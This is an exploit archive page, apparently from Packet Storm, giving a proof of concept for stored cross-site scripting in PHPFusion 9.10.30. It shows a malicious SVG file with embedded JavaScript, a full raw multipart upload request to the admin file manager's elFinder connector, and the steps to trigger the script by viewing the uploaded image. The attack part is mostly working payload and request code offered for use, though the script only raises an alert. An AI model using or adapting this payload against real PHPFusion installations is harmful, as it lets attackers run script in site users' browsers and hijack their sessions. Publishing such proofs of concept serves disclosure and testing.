what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHPFusion 9.10.30 Cross Site Scripting

PHPFusion 9.10.30 Cross Site Scripting
Posted May 3, 2023
Authored by Mirabbas Agalarov

PHPFusion version 9.10.30 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | aa251886281d962736d5731f2bc3b96ee2197a77f04ca5b9d031c9023887dfbc
Download | Favorite | View

PHPFusion 9.10.30 Cross Site Scripting

Change Mirror Download
Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs:  XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date of found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:


POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"

187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"

1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"

0
------WebKitFormBoundaryxF2jB690PpLWInAA--


3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)



poc video : https://youtu.be/6yBLnRH8pOY

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close